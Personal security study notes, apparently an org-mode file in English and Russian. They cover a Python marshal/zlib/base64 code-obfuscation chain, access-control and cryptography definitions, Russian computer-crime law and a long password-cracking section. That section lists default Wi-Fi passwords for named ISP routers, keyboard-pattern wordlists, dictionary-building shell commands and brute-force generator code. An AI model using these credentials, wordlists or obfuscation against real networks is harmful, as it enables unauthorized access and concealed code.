see hacking#MissingReference

import marshal
import zlib
import base64

code = """
# your Python code here
print("Hello, World!")
"""

marshaled_code = marshal.dumps(compile(code, '<string>', 'exec'))
print("Marshaled code:", marshaled_code)

compressed_code = zlib.compress(marshaled_code)
print("Compressed code:", compressed_code)

encoded_code = base64.b64encode(compressed_code)
print("Encoded code:", encoded_code)

reversed_code = encoded_code[::-1]
print("Reversed code:", reversed_code)

# Decompression step
decompressed_code = zlib.decompress(base64.b64decode(reversed_code[::-1]))
print("Decompressed code:", decompressed_code)

exec(marshal.loads(decompressed_code))

Marshaled code: b'c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xf3\x14\x00\x00\x00\x97\x00\x02\x00e\x00d\x00\xab\x01\x00\x00\x00\x00\x00\x00\x01\x00y\x01)\x02z\rHello, World!N)\x01\xda\x05print\xa9\x00\xf3\x00\x00\x00\x00\xfa\x08<string>\xfa\x08<module>r\x05\x00\x00\x00\x01\x00\x00\x00s\x0f\x00\x00\x00\xf0\x03\x01\x01\x01\xf1\x06\x00\x01\x06\x80o\xd5\x00\x16r\x03\x00\x00\x00'
Compressed code: b'x\x9cKf@\x02\xccP\xfa\xb3\x08\x90\x98\xce\xc0\xc4\x90\xca\x90\xc2\xb0\x9a\x11"\xc8\xc8P\xc9\xa8\xc9T\xc5\xeb\x91\x9a\x93\x93\xaf\xa3\x10\x9e_\x94\x93\xa2\xe8\xa7\xc9x\x8b\xb5\xa0(3\xafd%\xc3g\x90\xaa_\x1c6\xc5%@~\xba\x1d\x90\x95\x9b\x9fR\x9a\x93jW\xc4\n\xd6\xce\xc0P\xcc\x0f$>0322~dc`dk\xc8\xbf\xca V\x04\xb2\x14\x00Bx\x1b\x84'
Encoded code: b'eJxLZkACzFD6swiQmM7AxJDKkMKwmhEiyMhQyajJVMXrkZqTk6+jEJ5flJOi6KfJeIu1oCgzr2Qlw2eQql8cNsUlQH66HZCVm59SmpNqV8QK1s7AUMwPJD4wMzIyfmRjYGRryL/KIFYEshQAQngbhA=='
Reversed code: b'==AhbgnQAQhsEYFIK/LyrRGYjRmfyIzMw4DJPwMUA7s1KQ8VqNpmS95mVCZH66HQlUsNc8lqQe2wlQ2rzgCo1uIeJfK6iOJlf5JEj+6kTqZkrXMVJjayQhMyiEhmwKMkKDJxA7MmQiws6DFzCAkZLxJe'
Decompressed code: b'c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xf3\x14\x00\x00\x00\x97\x00\x02\x00e\x00d\x00\xab\x01\x00\x00\x00\x00\x00\x00\x01\x00y\x01)\x02z\rHello, World!N)\x01\xda\x05print\xa9\x00\xf3\x00\x00\x00\x00\xfa\x08<string>\xfa\x08<module>r\x05\x00\x00\x00\x01\x00\x00\x00s\x0f\x00\x00\x00\xf0\x03\x01\x01\x01\xf1\x06\x00\x01\x06\x80o\xd5\x00\x16r\x03\x00\x00\x00'
Hello, World!

_ = lambda __ : __import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(__[::-1])));exec((_)(b'==AhbgnQAQhsEYFIK/LyrRGYjRmfyIzMw4DJPwMUA7s1KQ8VqNpmS95mVCZH66HQlUsNc8lqQe2wlQ2rzgCo1uIeJfK6iOJlf5JEj+6kTqZkrXMVJjayQhMyiEhmwKMkKDJxA7MmQiws6DFzCAkZLxJe'))

Hello, World!

import marshal
import zlib
import base64

code = """
# your Python code here
print("Hello, World!")
"""

marshaled_code = marshal.dumps(compile(code, '<string>', 'exec'))
compressed_code = zlib.compress(marshaled_code)
# print(compressed_code)

import struct

def encode_binary_data(data):
    encoded_data = ''
    for i in range(0, len(data), 4):
        chunk = data[i:i+4]
        if len(chunk) < 4:
            chunk += b'\x00' * (4 - len(chunk))
        value = struct.unpack('>I', chunk)[0]
        encoded_data += chr(0xC0 | (value >> 18)) + chr(0x80 | ((value >> 12) & 0x3F)) + chr(0x80 | ((value >> 6) & 0x3F)) + chr(0x80 | (value & 0x3F))
    return encoded_data

# def encode_binary_data(data):
#     encoded_data = ''
#     for i in range(0, len(data), 4):
#         chunk = data[i:i+4]
#         if len(chunk) < 4:
#             chunk += b'\x00' * (4 - len(chunk))
#         value = struct.unpack('>I', chunk)[0]
#         encoded_data += chr(0xF0 | (value >> 18)) + chr(0x80 | ((value >> 12) & 0x3F)) + chr(0x80 | ((value >> 6) & 0x3F)) + chr(0x80 | (value & 0x3F))
#     return encoded_data

# Example usage:
encoded_data = encode_binary_data(compressed_code)
print("Utf-8 code:", encoded_data)
base64_code = base64.b64encode(compressed_code)
print("Base64 code:", base64_code)

Utf-8 code: ủ„­¦Ⴠ¬±㻬°¢⛳¬ƒ„⓲©ƒ‚⳦¡„¢㋲…ƒ‰⫲•“…㫤™ª“⓫ºŒ⟗¹’“⣺ŠŸ‰Ợ»– ૌº½¤ৰ¶ž⫗±°¶㇉”¾⻇™‚•⛧µŠšⓚ¥Ÿ„˵¬»€ᓳ€¼¤࿌ƒŒ²೟¦‘£ᣙ†¯ˆ⿲¢–Ǭ¡€პ®„
Base64 code: b'eJxLZkACzFD6swiQmM7AxJDKkMKwmhEiyMhQyajJVMXrkZqTk6+jEJ5flJOi6KfJeIu1oCgzr2Qlw2eQql8cNsUlQH66HZCVm59SmpNqV8QK1s7AUMwPJD4wMzIyfmRjYGRryL/KIFYEshQAQngbhA=='

#+begin_src python :results output :exports both :session s1
import socket

def reverse_dns_lookup(ip):
    try:
        return socket.gethostbyaddr(ip)[0]
    except socket.herror:
        return None

dnsrec = reverse_dns_lookup('5.255.255.242')
if dnsrec:
    for x in dnsrec.split('.')[:-1]:
        print(x)

ya
ru

ip4: "^([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\\.([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])){3}$"
ipv6: "^\\[(([0-9a-f]{0,4}:){1,7}[0-9a-f]{1,4})\\]$"

Null Byte :- heres https://www.youtube.com/channel/UCgTNupxATBfWmfehv21ym-g SecurityFWD :- here https://www.youtube.com/c/SecurityFWD/videos LiveOverflow :- here https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/videos Seytonic :- here https://www.youtube.com/c/Seytonic/videos HackerSploit :- here https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q Hak5 :- here https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ Unkn0wnUser :- here https://www.youtube.com/c/Unkn0wnUser/videos PwnFunction :- here https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A Loi Liang Yang :- here https://www.youtube.com/channel/UC1szFCBUWXY3ESff8dJjjzw OALabs :- here https://www.youtube.com/c/OALabs/videos

course 2023 rus https://www.youtube.com/playlist?list=PLrXcA7Ca3B81tWWOaGF_RjDq-9F1e5Ine

• authentication https://thunix.net/~defanor/notes/user-authentication.xhtml
• NIST Digital Identity Guidelines https://pages.nist.gov/800-63-3/sp800-63b.html

Attacks & Defences

• Malware & Attack Technologies - exploits, ditributed malicious systems
• Adversarial Behaviours - malware supply chains, attack vectors, mokney transfers
• Security Operations & Incident Management - securre systems, threat intelligence
• Forensics - collection analysis and reporting of digital evidence

System security

• Operating Systems & Virtualisation sec - sharing of resources, multiuser, database
• Cryptography - protocols that use them
• Formal Methods for Security -
• Hardware Security - Infrastructure security
• Network sec - Infrastructure security
• Authentication, Authorisation & Accountability -
• Distributed Systems sec - secure consensus, time, event systems, peer-to-peer, cloud, multitenant data center
• Web & Mobile sec - Software & Plstform security

Infrastructure security

• Applied Cryptography - application, issues around implementation,key management, use within protocols and systems
• Cyber Physical systems - internet of things & industrial control systems, attacker models, large-scale infrastructures
• Physical Layer and Telecommunications sec - concertns ans limitations of the physical layer, radio frequency encoding, unintended radiation, interference

Software & Plstform security

• software sec - programming errors, sec bugs
• Secure software lifecycle -

Computer access control

• identification - prove person identity
• authorization - approve request by access prolicy
• authentication - verifying that identity
• access approval - requests in session
• audit trail - audit log

resource or object

machine or data.

subject

is an active entity that requests access to a resource or the data within a resource. E.g.: user, program, process etc.

Access

is the flow of information between a subject and a resource.

Access controls

are security features that control how users and systems communicate and interact with other systems and resources.

protection rings

hierarchical protection domains mechanisms to protect data and functionality from faults (by improving fault tolerance) and malicious behavior (by providing computer security).

confused deputy problem

a computer program that is tricked by another program (with fewer privileges or less rights) into misusing its authority on the system. specific type of privilege escalation.

privilege

delegation of authority to perform security-relevant functions on a computer system. automatic, granted, or applied for.

access matrix

subject-resource

unilaterally abrogate

отказ в одностороннем порядке

unilateral [/ˌyo͞onəˈladərəl/]

односторонний

threat model

threats + rule some threats explicitly out of scope. describes the capabilities that an attacker is assumed to be able to deploy against a resource

Passive Attacks

attacker reads but not write

• separate device with OTP calculator

• discussed as a possible replacement for, as well as an enhancer to, traditional passwords

  • in contrast to static passwords, they are not vulnerable to replay attacks
  • user who uses the same (or similar) password for multiple systems, is not made vulnerable on all of them, if the

  password for one of these is gained by an attacker

• hard token - base for OTP calculator

synchronization may be based on:

• time
• algorithm and previous password
• algorithm and new password is based on a challenge

the principle of least privilege (PoLP) or the principle of minimal privilege (PoMP) or the principle of least authority (PoLA)

• requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user, or a program, depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.

Separation of Duties - Separating any conflicting areas of responsibility so as to reduce opportunities for unauthorized or unintentional modification or misuse of organizational assets and/or information.

Need to know - It is based on the concept that individuals should be given access only to the information that they absolutely require in order to perform their job duties.

AHAT, “always have an audit trail” - audit log. At least you will know what, where, and when.

https://en.wikibooks.org/wiki/Fundamentals_of_Information_Systems_Security/Access_Control_Systems#Access_Control_Practices

• Security by obscurity - Hiding the act of hiding
• security by design
• open security - relying on open source

• Information security - practice of protecting information by mitigating information risks. It is part of information risk management.
• Security engineering - process of incorporating security controls into an information system so that the controls become an integral part of the system’s operational capabilities
• Intrusion detection system - device or software application that monitors a network or systems for malicious activity or policy violations. collected centrally using a security information and event management (SIEM) system
  • network intrusion detection systems (NIDS)
  • host-based intrusion detection systems (HIDS)
• Countersurveillance

Negligible Functions - calculate probability of success hacker attack. ex. 2^-n

• negligible probability - attack is practically impossible.

One-time pad - encryption technique that cannot be cracked

Diffie–Hellman key exchange - one of the first public-key protocols

Symmetric encryption - reverse substitution and transpositions transformations without knowing the key

Asymmetric encryption - depend on mathematical problems that are thought to be difficult to solve

Semantic security - ciphertext indistinguishability - hard to guess element of message space. the adversary should learn no information from seeing a ciphertext

• semantically insecure algorithms: RSA
• random encryption padding schemes can increase Semantic security, ex Optimal Asymmetric Encryption Padding (OAEP)

Zero-knowledge proof - proof that you have some information without revealing it. are probabilistic "proofs" rather than deterministic proofs.

• Protocol characterstics:
  • transparent protocol is one that does not require any trusted setup and uses public randomness.
  • universal protocol is one that does not require a separate trusted setup for each circuit.
  • plausibly post-quantum protocol is one that is not susceptible to known attacks involving quantum algorithms.
• Variants:

  perfect zero-knowledge

  if the distributions produced by the simulator(“looks like”) and the proof protocol are distributed exactly the same.

  Statistical zero-knowledge

  sitributions statistically close.

  (no term)

• Applications:
  • Cryptocurrencies: ZKPs ensure transactions are valid without revealing sensitive information about the parties involved.

Oracle machine - can be visualized as a Turing machine with a black box, called an oracle, which is able to solve certain problems in a single operation

PKCS - for "Public Key Cryptography Standards" published by RSA Security LLC

public key infrastructure (PKI) - is a set of roles, policies, hardware, software and procedures. The X.509 standard defines the most commonly used format for public key certificates.

• certificate authority (CA) - stores, issues and signs the digital certificates
• registration authority (RA) - verifies the identity of entities requesting their digital certificates to be stored at the CA

Public key certificate - electronic document used to prove the validity of a public key

• include: digital signature of the issuer that has verified the certificate's contents

Key derivation function - cryptographic algorithm that derives one or more secret keys from a secret value using a pseudorandom function.

• Ex. result of a Diffie–Hellman key exchange into a symmetric key for use with AES
• Ex. password hashing

• Known-plaintext attack (KPA) - attacker has access to both the plaintext (called a crib), and its encrypted version (ciphertext)
• Chosen-plaintext attack (CPA) - attacker can obtain the ciphertexts for arbitrary plaintexts
• Chosen-ciphertext attack (CCA) - with obtained decryptions of chosen ciphertexts.
• Adaptive chosen-ciphertext attack (CCA2) - attacker first sends a number of ciphertexts to be decrypted chosen adaptively, then uses the results to distinguish a target ciphertext without consulting the oracle on the challenge ciphertext - интерактивная форма атаки с выбранным зашифрованным текстом, в которой злоумышленник сначала отправляет несколько зашифрованных текстов для дешифрования, выбранных адаптивно, затем использует результаты для распознавания целевого зашифрованного текста, не консультируясь с oracle по зашифрованному тексту вызова

• Replay attack network attack in which a valid data transmission is repeated or delayed
  • possibly as part of a spoofing attack by IP packet substitution
  • prevented with session id/token
• spoofing attack
• Denial-of-service attack (DoS)
• Man-in-the-middle attack (MITM) - alters the communications

TODO expliot

• injection

На первом происходит компрометация доступных из Интернета устройств через использование уязвимостей нулевого дня. Получив доступ, злоумышленники загружают на взломанные устройства вредоносное ПО.

• 0-day уязвимостей и целевых атак

На втором этапе с помощью сетевого сканирования выявляются уязвимые устройства уже во внутренней сети жертвы. Этап позволяет оценить ценность доступных целей и выбрать дальнейшую тактику атаки.

На третьем этапе взломанные устройства используются для рассылки целевых фишинговых писем сотрудникам организации, что дополнительно повышает эффективность атаки.

• all attacks https://portswigger.net/kb/issues

• Attribution is the art of answering a question: who did it?
• Sine qua non - latin условие, без которого
• The attribution of an attack to a state or state agents is a condicio sine qua non under international law.

• tactical goal - technical aspects, the how
  • What was the intrusion mechanism?
• perational goal - the attack’s high-level architecture and the attacker’s profile — the what
  • What was the motive?
• strategic goal - assessing the attack’s rationale, significance, appropriate response — the who and why.
• communication - communicating the outcome of a labour-intensive forensic investigation

aperture: the scope of sources that can be brought to bear on a specific investigation

http://www.ceae.ru/urids-komp-prestup.htm

Управление "К" МВД РФ и отделы "К" региональных управлений внутренних дел,входящие в состав Бюро специальных технических мероприятий МВД РФ.

общим объектом компьютерных преступлений будет совокупность всех общественных отношений, охраняемых уголовным законом, родовым - общественная безопасность и общ. порядок; видовым - совокупность общественных отношений по правомерному и безопасному использованию информации; непосредственный объект трактуется исходя из названий и диспозиций конкретных статей.

Отсутствие посягательства на эти общественные отношения (либо незначительность такого посягательства) исключает уголовную ответственность в силу ч. 2 ст. 14 УК РФ

гл. 28 УК, которое говорит не о посягательстве на объект, а о посягательствах в определенной "сфере".

Преступлениями в сфере компьютерной информации являются:

1. Неправомерный доступ к компьютерной информации (ст.272 УК РФ);
2. Создание, использование и распространение вредоносных программ для ЭВМ (ст.273 УК РФ);
3. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети (ст.274 УК РФ);

Физическое повреждение или уничтожение компьютерной техники, незаконное завладение ею, а равно машинными носителями (дискетами, CD-R дисками), как предметами, обладающими материальной ценностью, квалифицируются по статьям главы 21 УК РФ

Между деянием и последствиями обязательно должна быть установлена причинная связь.

Субъективная сторона компьютерных преступлений характеризуется умышленной виной.

В ч. 2 ст. 24 сказано, что деяние совершенное по неосторожности признается преступлением только тогда, когда это специально предусмотрено соответствующей статьей Особенной части УК

лицо, имеющее доступ к ЭВМ, системе ЭВМ или их сети.

1. Default passwords
2. key sequence, reverse key sequences
3. personal information
   • name
   • birthday - 1/1/1970 1.1.1970, 1/1/70
   • phone number 89……… or +79………
   • personal number
   • address
   • nicknames
4. space specific: site, company, chat
5. language specific words and universal worlds
6. double 3,4,5 words

OWASP SecLists Project

• https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt

password, default, admin, root, guest, year2000, manager, digit, private, D-Link, alpine, telco

• https://www.routerpasswords.com/
• https://github.com/3mrgnc3/RouterKeySpaceWordlists
• TP Link - 8 chars [0-9]
• qtech: 32625585
• hiawei: 07225C45827
• ZTE: eCavtVDe, d21????F
• keenetic: ncKxATQn
  • keenetic-3055:cMHsmdj3
  • keenetic-4345:9mftKELH
  • keenetic-0809:ouzPMWxL
  • Keenetic(ZyXEL): en5Klc55
• ZyXEL Kenetic Giga:pin:51029203
• netis:password
• Wifire-2.4: YFOP7PBM
• WiFi-DOM.ri:KCAmwrPiGH
• Ростелеком:BFW7P3PQ, RT_WiFiADE8:v2VKfEyg, RT_WiFi0E65:Ce2ch5ex
  • RT_Wifi:user:qtech,pass:qtech
  • RT-WIFI QTECH:123456789012
  • RT_WiFi(ZTE CORP):gqYyAaeX
  • ROSTELECOM_(Sagemcom):MCR4F64F
• MTSRouter_(SERCOMM):RRgA9jTF
  • UniversalRouterMTS(Sagemcom):VG97ACNG,admin,mts
  • MTSRouter(D-Link):43621996, MTSRouter(D-Link DIR-615):37674724
  • MTSRouter_2.4G(SERCOMM):8-chan up down alphanumeric
  • MTS_Router240985-77ed-D-Link_{International}: 10048566
  • MTSRouter_404E27(D-Link_{International}):8 chars [0-9]
• MGTS_GPON
  • SERCOMM
    • MGTS_GPON9921: H6RU5R6P - SERCOMM
    • MGTS_GPON7901: JMZQ88VZ - SERCOMM
    • 9883: ZCMKTKSS
    • MGTS_GPON9949 / MGTS_GPON59949 : MQK6MNTK
  • zte corporation
    • MGTS_GPON37E1: 23f3de64
    • MGTS_GPON3ED2: 8ab8b02f
    • MGTS_GPONF337 / MGTS_GPON5F337 : nbNjFWGb
    • MGTS_GPON4AFE / MGTS_GPON54AFE : eft6n7jK
• GPON терминал - ZTE-bc865e: 981428bc
• Beeline(SmartBox turbo+):mnm2xq6x
  • Beeline(SmartBox one):WJmNgmX6AT
• MERCUSYS_:25399653
• (Huawei home router)SUPERONLINE_WiFi:94HTFJTAYMMY
  • VDF-HG532e:WEB:
  • WirelessNet(EchoLife):mgtswifi
  • HUAWEI-v7e9:485754438DF0639D
  • 4G-Mobile-WiFi:e
• UR-325BN: D4BF7F05AF2D
• HGU0C830:624AC830
• D-Ling(DIR-620):pin:1234123412
• ASUS:pin:00343459,pin:38472585
• TRENDnet810_2.4:81031005793,admin,BY6Q3AKD
• ZTE:2sat943s
• ubiquiti networks: ubnt/ubnt, no default WPA pass - must be set up
• AndroidAP: yjru7079

• password, adminadmin, AdminAdmin, passWord, PassWord
• 123, 1234, 12345, 123456, 1234567, 12345678, 123456789
• qwe, qwer, qwert, qwerty, qwertyu, qwertyui, qwertyuio, qwertyuiop
• asd, asdf, asdfg, asdfgh, asdfghj, asdfghjk, asdfghjkl
• zxc, zxcv, zxcvb, zxcvbn, zxcvbnm, zxcvbnm,
• qazqaz, qazqazqaz, wsxwsx, wsxwsxwsx, edcedc, edcedcedc
• 1qaz, 1qaz2wsx, 1qaz2wsx3edc
• qazwsx, qazwsx123, 123qazwsx, qazwsxedc, qazwsxedcrfv
• qazxsw, 123qazxsw, qazxswedc
• abcd, abcde, abcdef, abcdefg, abcdefgh
• 1q2w3e4r5t6y, 1q2w3e4r5t6, 1q2w3e4r5t, 1q2w3e4r5, 1q2w3e4r, 1q2w3e4, 1q2w3e, 1q2w3, 1q2w
• q1w2e3r4t5y6, q1w2e3r4t5y, q1w2e3r4t5, q1w2e3r4t, q1w2e3r4, q1w2e3r, q1w2e3, q1w2e, q1w2
• REP8 4-10: alphabet+spec = aaaaaaaa, bbbbbbbb, 11111111
• PERM2 2-4: 1 2 3 4 5 6 7 8 9 - = = 12121212, 32323232, ----
• PROD 2-3: 123 qwe asd zxc 321 ewq dsa cxz = 123123, 123qwe, qwe123
• PROD 2: 1234 qwer asdf zxcv 4321 rewq fdsa vcxz = 12341234, 1234qwer,
• RARE! REP2: 12345, qwert, asdf, zxcvb, 54321, trewq, fdsa, bvcxz
• PROD2,3: qaz wsx, edc, zaq xsw, cde, 123, 321
• PROD2: 1qaz, 2wsx, 3edc, zaq1, xsw2, cde3
• PROD4: 12, 21, qw, as, zx, wq, sa, xz
• PROD4: 12, 21, po, op, lk, kl, mn, nm
• PAIRS2-4 from: qwertyuiop[], asdfghjkl;', zxcvbnm, (and reverse): qwqwqwqw, wewewewe
• adadadad, asasasas, asas, qeqeqeqe, qeqe, zczc, zczczczc, qeqe, qeqeqeqe
• 1234567a, 123456aa, 1234aaaa, 123aaaa
• a1234567, aa123456, aaa12345, aaaa1234
• 11223344, 1122334455, 111222333, 11112222
• 1234abcd, 12345abcd, 12345abc, 123456abcd, 12345abc, 123456abc
• 123456789a, 1234567a, 1234567b, 12345678b, 1234567c
• a123456789, a1234567, b1234567, b12345678, c1234567
• 789456123, 890567234, 321654987
• qwerty123, qwert123, 123qwerty, qwert123, 12345qwe, 12345qwer, 123456qw
• 1234567890, 123456789, 12345678, 0123456789, 012345678
• 12344321, 123454321, 1234554321
• 1qazxsw2
• 102030405, 102030405, 1020304050, 102030406, 01020304, 0102030405
• 147258369, 741852963, 963852741
• qwaszx, 123qwaszx, qwaszx123, zxasqw, zxasqw123, 123zxasqw
• 1234567891
• 1qazxsw2
• 1029384756, 0192837465, 1092387456, 0129834765
• zaq12wsx
• 0987654321, 098765432, 09876543, 0987654, 098765, 09876, 0987, 098
• !@#$%^&*()_+, !@#$%^&*()_, !@#$%^&*(), !@#$%^&*(, !@#$%^&*

transfer:

1. copy this to file key_sequences

cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' > key_sequences_cap
cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' | tr [:lower:] [:upper:] >> key_sequences_cap
cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' | tr [:upper:] [:lower:] >> key_sequences_cap
cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' | rev >> key_sequences_cap
cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' | rev | tr [:lower:] [:upper:] >> key_sequences_cap
cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' | rev | tr [:upper:] [:lower:] >> key_sequences_cap
cat key_sequences_cap | uniq |sed -nr '/^.{8,12}$/p' > key_sequences_cap8-12u

• year, month, date - date, month, year
  • simple
  • 0
  • with/without 0 with special characters as separators .,_,-,/,#
  • without 20 and 19 in year

• divide letters to 1,2,3,4 parts - first, one of, or every second is capital
  • The first letter is a capital letter.
• additional characters
• simple obfuscation or Replacement Password Pattern

• simple - 1, 11, 12, 13, 123, a, q, qq, aa, 0, 00, 01, 2, 3, 7, ., _, !, -, @, *, #, /, $
• double and triple of 1 character simple
• any digital double - 11, 22, 33
• zero + 1 digital: 01,02,03,04
• special numbers - 50,100,1000,300,30,18,7
• english: ',

• a - @
• o - 0
• i/l - 1/|
• s - 5/$
• b/g - 6
• g - 9

• https://github.com/josuamarcelc/common-password-list/tree/main

filter:

cat words | grep -v "^*" | cut -f 2- -d ' ' | sed 's/, /\n/g'

add endings “.”

cat words | sed 's/$/./'

%

• only lower - 41,67
• mixed letters and numeric - 37
• only numeric - 15
• contains special charactes - 3.8
• only upper cases - 1.62

characters % (without ")

• . - 0.7
• _ - 0.58
• ! - 0.55
• - - 0.39
• @ - 0.32
• * - 0.3
• # - 0.18
• / - 0.12
• $ - 0.1
• , - 0.09
• & - 0.088
• ? - 0.08
• + - 0.073
• = - 0.057
• ) - 0.056
• ( - 0.055
• ' - 0.05
• ; - 0.044

• hashcat
• John the Ripper
• PasswordsPro:
• Rsmangler
• crunch

• john rules on name
• one word: all sequences and worlds capitalized and filtered
• most common
• dates
• two words
• john rules on "one word"

old

• key sequence (sequences.txt) + dates
• reverse sequences (sequences_rev.txt)
• sequence words (wordlist_ks) + default passwords
• sequence words (wordlist_ks) + default passwords (upper lower)
• reverse sequence words (wordlist_ks)
• reverse sequence words (wordlist_ks) (upper lower)
• filtered sequence words result (wordlist_ks8)
• all numbers = 8 (alldigits8.txt)
• all numbers = 10 (alldigits10.txt)
• all numbers+A-F - upper, lower, 8, 10, 9
• >8 normal =n.txt
• >8 all lowercase =l.txt
• >8 all uppercase =u.txt
• >8 capitalized
• <5 double normal
• <5 double all lowercase
• <5 double all upper
• <5 double first upper second lower
• <5 double first lowwer second upper

sort by symbols

• cat old-driver-passwords | nl -b a -s : | sort -t : -k 2 -u | cut -d : -f 2- > old-driver-passwords

filter lines 2-8 chars

• grep -E '^.{2,8}$' –color=never infile
• sed -nr '/^.{2,8}$/p' infile
• cat TOP_VK-100M_WPA.txt | grep -o -E '[a-zA-Z]{4,}' | uniq

reverse characters: rev

shuffle and random line: shuf

• < /dev/urandom tr -dc _A-Z-a-z-0-9 | head -c 32 ;echo;
• tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1

strings /dev/urandom | grep -o '[[:alnum:]]' | head -n 30 | tr -d '\n'; echo

• < /dev/urandom tr -dc _A-Z-a-z-0-9 | fold -w8
• dd if=/dev/urandom bs=1 count=32 2>/dev/null | base64 -w 0 | rev | cut -b 2- | rev
• openssl rand -base64 32
• date | md5sum
• date +%s | sha256sum | base64 | head -c 32 ; echo

tmpfs

• mount -t tmpfs -o size=10m tmpfs /tmp/a

• vk https://github.com/tokyoneon/1wordlist/
  • https://null-byte.wonderhowto.com/how-to/use-leaked-password-databases-create-brute-force-wordlists-0184006/

• C++ https://www.quickperm.org/01example.php

// NOTICE:  Copyright 2008, Phillip Paul Fuchs

#define N    12   // number of elements to permute.  Let N > 2


// NOTICE:  Copyright 2008, Phillip Paul Fuchs

void display(unsigned int *a, unsigned int j, unsigned int i) {
   for(unsigned int x = 0; x < N; x++)
      printf("%d ",a[x]);
   printf("   swapped(%d, %d)\n", j, i);
   //getch();  // Remove comment for "Press any key to continue" prompt.
} // display()


void QuickPerm(void) {
   unsigned int a[N], p[N];
   register unsigned int i, j, tmp; // Upper Index i; Lower Index j

   for(i = 0; i < N; i++) {  // initialize arrays; a[N] can be any type
      a[i] = i + 1;   // a[i] value is not revealed and can be arbitrary
      p[i] = 0;       // p[i] == i controls iteration and index boundaries for i
   }
   //display(a, 0, 0);   // remove comment to display array a[]
   i = 1;   // setup first swap points to be 1 and 0 respectively (i & j)
   while(i < N) {
      if (p[i] < i) {
         j = i % 2 * p[i];   // IF i is odd then j = p[i] otherwise j = 0
         tmp = a[j];         // swap(a[j], a[i])
         a[j] = a[i];
         a[i] = tmp;
         display(a, j, i); // remove comment to display target array a[]
         p[i]++;             // increase index "weight" for i by one
         i = 1;              // reset index i to 1 (assumed)
      } else {               // otherwise p[i] == i
         p[i] = 0;           // reset p[i] to zero
         i++;                // set new index value for i (increase by one)
      } // if (p[i] < i)
   } // while(i < N)
} // QuickPerm()




int main(){
  QuickPerm()
}

• https://github.com/Jsdemonsim/Stackoverflow/tree/master/alphabet

// Print all combinations of the given alphabet up to length n.
//
// Example: length 3 combinations are:
//
// aaa
// aab
// aac
// ...
// aa9
// aba
// abb
// abc
// ...
// a99
// baa
// bab
// ...
// 998
// 999
//
// The best way to test this program is to output to /dev/null, otherwise
// the file I/O will dominate the test time.
//
// This is the same as alphabet.c except this version uses 3 hardcoded
// letters instead of 2.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

const char *alphabet = "abcdefghijklmnopqrstuvwxyz"
                       "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                       "0123456789";

static void generate(int maxlen);

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "Usage: %s Length\n", argv[0]);
        exit(1);
    }

    generate(atoi(argv[1]));
    return 0;
}

/**
 * Generates all patterns of the alphabet up to maxlen in length.  This
 * function uses a buffer that holds alphaLen^3 patterns at a time.
 * One pattern of length 5 would be "aaaaa\n".  The reason that alphaLen^3
 * patterns are used is because we prepopulate the buffer with the last 3
 * letters already set to all possible combinations.  So for example,
 * the buffer initially looks like "aaaaa\naaaab\naaaac\n ... aa999\n".  Then
 * on every iteration, we write() the buffer out, and then increment the
 * fourth to last letter.  So on the first iteration, the buffer is modified
 * to look like "abaaa\nabaab\nabaac\n ... ab999\n".  This continues until
 * all combinations of letters are exhausted.
 */
static void generate(int maxlen)
{
    int   alphaLen = strlen(alphabet);
    int   len      = 0;
    char *buffer   = malloc((maxlen + 1) * alphaLen * alphaLen * alphaLen);
    int  *letters  = malloc(maxlen * sizeof(int));

    if (buffer == NULL || letters == NULL) {
        fprintf(stderr, "Not enough memory.\n");
        exit(1);
    }

    // This for loop generates all 1 letter patterns, then 2 letters, etc,
    // up to the given maxlen.
    for (len=1;len<=maxlen;len++) {
        // The stride is one larger than len because each line has a '\n'.
        int i;
        int stride = len+1;
        int bufLen = stride * alphaLen * alphaLen * alphaLen;

        if (len == 1) {
            // Special case.  The main algorithm hardcodes the last two
            // letters, so this case needs to be handled separately.
            int j = 0;
            bufLen = (len + 1) * alphaLen;
            for (i=0;i<alphaLen;i++) {
                buffer[j++] = alphabet[i];
                buffer[j++] = '\n';
            }
            write(STDOUT_FILENO, buffer, bufLen);
            continue;
        } else if (len == 2) {
            // Also a special case.
            int let0 = 0;
            int let1 = 0;
            bufLen = (len + 1) * alphaLen * alphaLen;
            for (i=0;i<bufLen;i+=stride) {
                buffer[i]   = alphabet[let0];
                buffer[i+1] = alphabet[let1++];
                buffer[i+2] = '\n';
                if (let1 == alphaLen) {
                    let1 = 0;
                    let0++;
                    if (let0 == alphaLen)
                        let0 = 0;
                }
            }
            write(STDOUT_FILENO, buffer, bufLen);
            continue;
        }

        // Initialize buffer to contain all first letters.
        memset(buffer, alphabet[0], bufLen);

        // Now write all the last 3 letters and newlines, which
        // will after this not change during the main algorithm.
        {
            // Let0 is the 3rd to last letter.  Let1 is the 2nd to last letter.
            // Let2 is the last letter.
            int let0 = 0;
            int let1 = 0;
            int let2 = 0;
            for (i=len-3;i<bufLen;i+=stride) {
                buffer[i]   = alphabet[let0];
